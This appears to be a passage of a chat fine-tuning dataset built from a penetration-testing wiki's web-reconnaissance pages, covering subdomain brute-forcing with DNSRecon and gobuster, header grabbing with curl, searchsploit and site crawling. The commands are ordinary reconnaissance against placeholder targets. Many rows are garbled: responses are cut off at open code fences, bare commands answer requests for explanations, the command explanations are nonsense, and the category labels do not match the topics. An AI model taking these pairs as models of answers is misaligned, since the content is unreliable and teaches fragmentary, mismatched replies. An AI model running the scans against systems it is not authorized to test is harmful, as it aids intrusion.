clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Subdomains enumeration - DNSRecon"}, {"role": "assistant", "content": "DNSRecon (Python) can enumerate DNS information through the following techniques: check NS records for zone transfers, enumerate records, check for wildcard resolution, TLD expansion, bruteforce subdomain and host A and AAAA records given a wordlist, perform PTR lookup given an IP range, DNS cache snooping, etc.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Subdomains enumeration - DNSRecon", "response": "DNSRecon (Python) can enumerate DNS information through the following techniques: check NS records for zone transfers, enumerate records, check for wildcard resolution, TLD expansion, bruteforce subdomain and host A and AAAA records given a wordlist, perform PTR lookup given an IP range, DNS cache snooping, etc.\n\n```bash", "metadata": {"corpus_index": 1981, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Subdomains enumeration - DNSRecon"}, {"role": "assistant", "content": "DNSRecon (Python) can enumerate DNS information through the following techniques: check NS records for zone transfers, enumerate records, check for wildcard resolution, TLD expansion, bruteforce subdomain and host A and AAAA records given a wordlist, perform PTR lookup given an IP range, DNS cache snooping, etc.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Subdomains enumeration - DNSRecon", "response": "DNSRecon (Python) can enumerate DNS information through the following techniques: check NS records for zone transfers, enumerate records, check for wildcard resolution, TLD expansion, bruteforce subdomain and host A and AAAA records given a wordlist, perform PTR lookup given an IP range, DNS cache snooping, etc.\n\n```bash", "metadata": {"corpus_index": 1981, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe DNS bruteforcing/dictionnary attack in the context of penetration testing"}, {"role": "assistant", "content": "dnsrecon -t brt -d \"target.domain\" -n \"nameserver.com\" -D \"/path/to/wordlist\"\n```"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe DNS bruteforcing/dictionnary attack in the context of penetration testing", "response": "dnsrecon -t brt -d \"target.domain\" -n \"nameserver.com\" -D \"/path/to/wordlist\"\n```", "metadata": {"corpus_index": 1982, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through DNS bruteforcing/dictionnary attack"}, {"role": "assistant", "content": "dnsrecon -t brt -d \"target.domain\" -n \"nameserver.com\" -D \"/path/to/wordlist\"\n```"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through DNS bruteforcing/dictionnary attack", "response": "dnsrecon -t brt -d \"target.domain\" -n \"nameserver.com\" -D \"/path/to/wordlist\"\n```", "metadata": {"corpus_index": 1982, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Subdomains enumeration - DNS bruteforcing work?"}, {"role": "assistant", "content": "Apart from Amass and DNSRecon mentioned above, gobuster (go) can be used to do DNS bruteforcing.\n\n``bash\ngobuster dns --domain \"target.domain\" --resolver \"nameserver\" --wordlist \"/path/to/wordlist\" \n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Subdomains enumeration - DNS bruteforcing work?", "response": "Apart from Amass and DNSRecon mentioned above, gobuster (go) can be used to do DNS bruteforcing.\n\n``bash\ngobuster dns --domain \"target.domain\" --resolver \"nameserver\" --wordlist \"/path/to/wordlist\" \n``", "metadata": {"corpus_index": 1983, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Subdomains enumeration - DNS bruteforcing?"}, {"role": "assistant", "content": "Apart from Amass and DNSRecon mentioned above, gobuster (go) can be used to do DNS bruteforcing.\n\n``bash\ngobuster dns --domain \"target.domain\" --resolver \"nameserver\" --wordlist \"/path/to/wordlist\" \n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Subdomains enumeration - DNS bruteforcing?", "response": "Apart from Amass and DNSRecon mentioned above, gobuster (go) can be used to do DNS bruteforcing.\n\n``bash\ngobuster dns --domain \"target.domain\" --resolver \"nameserver\" --wordlist \"/path/to/wordlist\" \n``", "metadata": {"corpus_index": 1983, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the gobuster command to subdomains enumeration - dns bruteforcing"}, {"role": "assistant", "content": "gobuster dns --domain \"target.domain\" --resolver \"nameserver\" --wordlist \"/path/to/wordlist\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the gobuster command to subdomains enumeration - dns bruteforcing", "response": "gobuster dns --domain \"target.domain\" --resolver \"nameserver\" --wordlist \"/path/to/wordlist\"", "metadata": {"corpus_index": 1984, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "gobuster"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Subdomains enumeration - DNS bruteforcing?"}, {"role": "assistant", "content": "gobuster dns --domain \"target.domain\" --resolver \"nameserver\" --wordlist \"/path/to/wordlist\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Subdomains enumeration - DNS bruteforcing?", "response": "gobuster dns --domain \"target.domain\" --resolver \"nameserver\" --wordlist \"/path/to/wordlist\"", "metadata": {"corpus_index": 1984, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `gobuster dns --domain \"target.domain\" --resolver \"nameserver\" --wordlist \"/path/to/wordlist\"`?"}, {"role": "assistant", "content": "This command is used for subdomains enumeration - dns bruteforcing. DNS bruteforcing"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `gobuster dns --domain \"target.domain\" --resolver \"nameserver\" --wordlist \"/path/to/wordlist\"`?", "response": "This command is used for subdomains enumeration - dns bruteforcing. DNS bruteforcing", "metadata": {"corpus_index": 1984, "category": "credentials", "source_file": "docs/src/web/recon/domains-enumeration.md", "page_title": "Subdomains enumeration", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Error messages - Theory"}, {"role": "assistant", "content": "It is common to browse websites that leak information regarding the technologies they use in various error messages. Attackers can try to willfully raise errors to find those information and have a better understanding of the attack surface."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Error messages - Theory", "response": "It is common to browse websites that leak information regarding the technologies they use in various error messages. Attackers can try to willfully raise errors to find those information and have a better understanding of the attack surface.", "metadata": {"corpus_index": 1985, "category": "web", "source_file": "docs/src/web/recon/error-messages.md", "page_title": "Error messages", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Error messages - Theory?"}, {"role": "assistant", "content": "It is common to browse websites that leak information regarding the technologies they use in various error messages. Attackers can try to willfully raise errors to find those information and have a better understanding of the attack surface."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Error messages - Theory?", "response": "It is common to browse websites that leak information regarding the technologies they use in various error messages. Attackers can try to willfully raise errors to find those information and have a better understanding of the attack surface.", "metadata": {"corpus_index": 1985, "category": "web", "source_file": "docs/src/web/recon/error-messages.md", "page_title": "Error messages", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Error messages - Practice"}, {"role": "assistant", "content": "Raising error pages and messages can be done manually when browsing the website by doing the following actions\n\n* requesting a page that doesn't exist (status code 404)\n* requesting a page without the proper rights (access control raising status code 403)\n* supplying garbage (special chars or wrong syntax) in user inputs (parameters, forms, headers) to raise syntax of filter errors."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Error messages - Practice", "response": "Raising error pages and messages can be done manually when browsing the website by doing the following actions\n\n* requesting a page that doesn't exist (status code 404)\n* requesting a page without the proper rights (access control raising status code 403)\n* supplying garbage (special chars or wrong syntax) in user inputs (parameters, forms, headers) to raise syntax of filter errors.", "metadata": {"corpus_index": 1986, "category": "web", "source_file": "docs/src/web/recon/error-messages.md", "page_title": "Error messages", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Error messages - Practice?"}, {"role": "assistant", "content": "Raising error pages and messages can be done manually when browsing the website by doing the following actions\n\n* requesting a page that doesn't exist (status code 404)\n* requesting a page without the proper rights (access control raising status code 403)\n* supplying garbage (special chars or wrong syntax) in user inputs (parameters, forms, headers) to raise syntax of filter errors."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Error messages - Practice?", "response": "Raising error pages and messages can be done manually when browsing the website by doing the following actions\n\n* requesting a page that doesn't exist (status code 404)\n* requesting a page without the proper rights (access control raising status code 403)\n* supplying garbage (special chars or wrong syntax) in user inputs (parameters, forms, headers) to raise syntax of filter errors.", "metadata": {"corpus_index": 1986, "category": "web", "source_file": "docs/src/web/recon/error-messages.md", "page_title": "Error messages", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe HTTP response headers - Theory in the context of penetration testing"}, {"role": "assistant", "content": "HTTP messages (requests and responses) always contain a line, header fields, an empty line and an optional message body. The header fields define the operating parameters of an HTTP transaction. Headers in request messages are called client headers while those in the responses are called server headers. On default web apps environments, it is not rare to find server headers that echo the technologies used like: Server, X-Powered-By, X-AspNet-Version...\n\nHTTP headers can sometimes indicate the use of a Content Management Systems (CMS) like WordPress or Drupal and help identify the technologies and CMS used."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe HTTP response headers - Theory in the context of penetration testing", "response": "HTTP messages (requests and responses) always contain a line, header fields, an empty line and an optional message body. The header fields define the operating parameters of an HTTP transaction. Headers in request messages are called client headers while those in the responses are called server headers. On default web apps environments, it is not rare to find server headers that echo the technologies used like: Server, X-Powered-By, X-AspNet-Version...\n\nHTTP headers can sometimes indicate the use of a Content Management Systems (CMS) like WordPress or Drupal and help identify the technologies and CMS used.", "metadata": {"corpus_index": 1987, "category": "active_directory", "source_file": "docs/src/web/recon/http-banners.md", "page_title": "HTTP response headers", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute HTTP response headers - Theory?"}, {"role": "assistant", "content": "HTTP messages (requests and responses) always contain a line, header fields, an empty line and an optional message body. The header fields define the operating parameters of an HTTP transaction. Headers in request messages are called client headers while those in the responses are called server headers. On default web apps environments, it is not rare to find server headers that echo the technologies used like: Server, X-Powered-By, X-AspNet-Version...\n\nHTTP headers can sometimes indicate the use of a Content Management Systems (CMS) like WordPress or Drupal and help identify the technologies and CMS used."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute HTTP response headers - Theory?", "response": "HTTP messages (requests and responses) always contain a line, header fields, an empty line and an optional message body. The header fields define the operating parameters of an HTTP transaction. Headers in request messages are called client headers while those in the responses are called server headers. On default web apps environments, it is not rare to find server headers that echo the technologies used like: Server, X-Powered-By, X-AspNet-Version...\n\nHTTP headers can sometimes indicate the use of a Content Management Systems (CMS) like WordPress or Drupal and help identify the technologies and CMS used.", "metadata": {"corpus_index": 1987, "category": "active_directory", "source_file": "docs/src/web/recon/http-banners.md", "page_title": "HTTP response headers", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe HTTP response headers - Practice in the context of penetration testing"}, {"role": "assistant", "content": "Send a simple HTTP request and in the response, look for server headers revealing the technologies and versions used.\n\n``bash\ncurl --location --head $URL\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe HTTP response headers - Practice in the context of penetration testing", "response": "Send a simple HTTP request and in the response, look for server headers revealing the technologies and versions used.\n\n``bash\ncurl --location --head $URL\n``", "metadata": {"corpus_index": 1988, "category": "active_directory", "source_file": "docs/src/web/recon/http-banners.md", "page_title": "HTTP response headers", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute HTTP response headers - Practice?"}, {"role": "assistant", "content": "Send a simple HTTP request and in the response, look for server headers revealing the technologies and versions used.\n\n``bash\ncurl --location --head $URL\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute HTTP response headers - Practice?", "response": "Send a simple HTTP request and in the response, look for server headers revealing the technologies and versions used.\n\n``bash\ncurl --location --head $URL\n``", "metadata": {"corpus_index": 1988, "category": "active_directory", "source_file": "docs/src/web/recon/http-banners.md", "page_title": "HTTP response headers", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the curl syntax for http response headers - practice?"}, {"role": "assistant", "content": "curl --location --head $URL"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the curl syntax for http response headers - practice?", "response": "curl --location --head $URL", "metadata": {"corpus_index": 1989, "category": "active_directory", "source_file": "docs/src/web/recon/http-banners.md", "page_title": "HTTP response headers", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "curl"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on HTTP response headers - Practice"}, {"role": "assistant", "content": "curl --location --head $URL"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on HTTP response headers - Practice", "response": "curl --location --head $URL", "metadata": {"corpus_index": 1989, "category": "active_directory", "source_file": "docs/src/web/recon/http-banners.md", "page_title": "HTTP response headers", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `curl --location --head $URL`?"}, {"role": "assistant", "content": "This command is used for http response headers - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `curl --location --head $URL`?", "response": "This command is used for http response headers - practice. Practice", "metadata": {"corpus_index": 1989, "category": "active_directory", "source_file": "docs/src/web/recon/http-banners.md", "page_title": "HTTP response headers", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Known vulnerabilities - Theory?"}, {"role": "assistant", "content": "This step ends the reconnaissance phase. The previous steps were aimed at gaining knowledge about the attack surface\n\n* Web server\n* Content Management System (CMS)\n* Web Application Firewall (WAF)\n* JavaScript Frameworks\n* and other technologies\n\nKnown vulnerabilities may then be identified depending on these information."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Known vulnerabilities - Theory?", "response": "This step ends the reconnaissance phase. The previous steps were aimed at gaining knowledge about the attack surface\n\n* Web server\n* Content Management System (CMS)\n* Web Application Firewall (WAF)\n* JavaScript Frameworks\n* and other technologies\n\nKnown vulnerabilities may then be identified depending on these information.", "metadata": {"corpus_index": 1990, "category": "web", "source_file": "docs/src/web/recon/known-vulnerabilities.md", "page_title": "Known vulnerabilities", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Known vulnerabilities - Theory?"}, {"role": "assistant", "content": "This step ends the reconnaissance phase. The previous steps were aimed at gaining knowledge about the attack surface\n\n* Web server\n* Content Management System (CMS)\n* Web Application Firewall (WAF)\n* JavaScript Frameworks\n* and other technologies\n\nKnown vulnerabilities may then be identified depending on these information."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Known vulnerabilities - Theory?", "response": "This step ends the reconnaissance phase. The previous steps were aimed at gaining knowledge about the attack surface\n\n* Web server\n* Content Management System (CMS)\n* Web Application Firewall (WAF)\n* JavaScript Frameworks\n* and other technologies\n\nKnown vulnerabilities may then be identified depending on these information.", "metadata": {"corpus_index": 1990, "category": "web", "source_file": "docs/src/web/recon/known-vulnerabilities.md", "page_title": "Known vulnerabilities", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Known vulnerabilities - Practice"}, {"role": "assistant", "content": "Known vulnerabilities can be found from the following resources\n\n* exploit-db.com: an online exploit database\n* searchsploit is a command-line utility that allows to do offline searches through the exploit-db\n* CVE Details, NVD NIST and MITRE are online CVE (Common Vulnerabilities and Exposures) searches\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Known vulnerabilities - Practice", "response": "Known vulnerabilities can be found from the following resources\n\n* exploit-db.com: an online exploit database\n* searchsploit is a command-line utility that allows to do offline searches through the exploit-db\n* CVE Details, NVD NIST and MITRE are online CVE (Common Vulnerabilities and Exposures) searches\n\n```bash", "metadata": {"corpus_index": 1991, "category": "web", "source_file": "docs/src/web/recon/known-vulnerabilities.md", "page_title": "Known vulnerabilities", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Known vulnerabilities - Practice?"}, {"role": "assistant", "content": "Known vulnerabilities can be found from the following resources\n\n* exploit-db.com: an online exploit database\n* searchsploit is a command-line utility that allows to do offline searches through the exploit-db\n* CVE Details, NVD NIST and MITRE are online CVE (Common Vulnerabilities and Exposures) searches\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Known vulnerabilities - Practice?", "response": "Known vulnerabilities can be found from the following resources\n\n* exploit-db.com: an online exploit database\n* searchsploit is a command-line utility that allows to do offline searches through the exploit-db\n* CVE Details, NVD NIST and MITRE are online CVE (Common Vulnerabilities and Exposures) searches\n\n```bash", "metadata": {"corpus_index": 1991, "category": "web", "source_file": "docs/src/web/recon/known-vulnerabilities.md", "page_title": "Known vulnerabilities", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Update the searchsploit database"}, {"role": "assistant", "content": "searchsploit -u\n```\n\nWhen a vulnerability is found, one can research a Proof-Of-Concept (PoC) to try at exploiting the vulnerability. Most public PoCs can be found on GitHub."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Update the searchsploit database", "response": "searchsploit -u\n```\n\nWhen a vulnerability is found, one can research a Proof-Of-Concept (PoC) to try at exploiting the vulnerability. Most public PoCs can be found on GitHub.", "metadata": {"corpus_index": 1992, "category": "web", "source_file": "docs/src/web/recon/known-vulnerabilities.md", "page_title": "Known vulnerabilities", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Update the searchsploit database?"}, {"role": "assistant", "content": "searchsploit -u\n```\n\nWhen a vulnerability is found, one can research a Proof-Of-Concept (PoC) to try at exploiting the vulnerability. Most public PoCs can be found on GitHub."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Update the searchsploit database?", "response": "searchsploit -u\n```\n\nWhen a vulnerability is found, one can research a Proof-Of-Concept (PoC) to try at exploiting the vulnerability. Most public PoCs can be found on GitHub.", "metadata": {"corpus_index": 1992, "category": "web", "source_file": "docs/src/web/recon/known-vulnerabilities.md", "page_title": "Known vulnerabilities", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Site crawling - Theory in the context of penetration testing"}, {"role": "assistant", "content": "When requesting a web application, the server usually sends code (in HTML, CSS, Javascript, ...) in the response. This code is then rendered by the web browser. Each page contains links to other pages of the web app and resources needed by the browser to improve the render.\n\nCrawling is a technique used to recursively follow those links and build the indexed website architecture. This architecture sometimes contains interesting links (admin log-in pages, API...) testers can focus on."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Site crawling - Theory in the context of penetration testing", "response": "When requesting a web application, the server usually sends code (in HTML, CSS, Javascript, ...) in the response. This code is then rendered by the web browser. Each page contains links to other pages of the web app and resources needed by the browser to improve the render.\n\nCrawling is a technique used to recursively follow those links and build the indexed website architecture. This architecture sometimes contains interesting links (admin log-in pages, API...) testers can focus on.", "metadata": {"corpus_index": 1993, "category": "web", "source_file": "docs/src/web/recon/site-crawling.md", "page_title": "Site crawling", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Site crawling - Theory?"}, {"role": "assistant", "content": "When requesting a web application, the server usually sends code (in HTML, CSS, Javascript, ...) in the response. This code is then rendered by the web browser. Each page contains links to other pages of the web app and resources needed by the browser to improve the render.\n\nCrawling is a technique used to recursively follow those links and build the indexed website architecture. This architecture sometimes contains interesting links (admin log-in pages, API...) testers can focus on."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Site crawling - Theory?", "response": "When requesting a web application, the server usually sends code (in HTML, CSS, Javascript, ...) in the response. This code is then rendered by the web browser. Each page contains links to other pages of the web app and resources needed by the browser to improve the render.\n\nCrawling is a technique used to recursively follow those links and build the indexed website architecture. This architecture sometimes contains interesting links (admin log-in pages, API...) testers can focus on.", "metadata": {"corpus_index": 1993, "category": "web", "source_file": "docs/src/web/recon/site-crawling.md", "page_title": "Site crawling", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Site crawling - Practice?"}, {"role": "assistant", "content": "Tools like katana (Go), hakrawler (Go), scrapy (Python) and spidy (Python), and many other tools can be used for that purpose.\n\n== katana\n\nkatana -u $URL -d 10\n\n== hakrawler\n\necho $URL | hakrawler -d 10\n\nBurp Suite's graphical interface is a great alternative (Dashboard > New scan (Crawl) then Target).\n\nOnce the crawling is over, testers need to inspect the website architecture and look for admin paths, unusual redirections and anything that could lead to a potential vulnerability."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Site crawling - Practice?", "response": "Tools like katana (Go), hakrawler (Go), scrapy (Python) and spidy (Python), and many other tools can be used for that purpose.\n\n== katana\n\nkatana -u $URL -d 10\n\n== 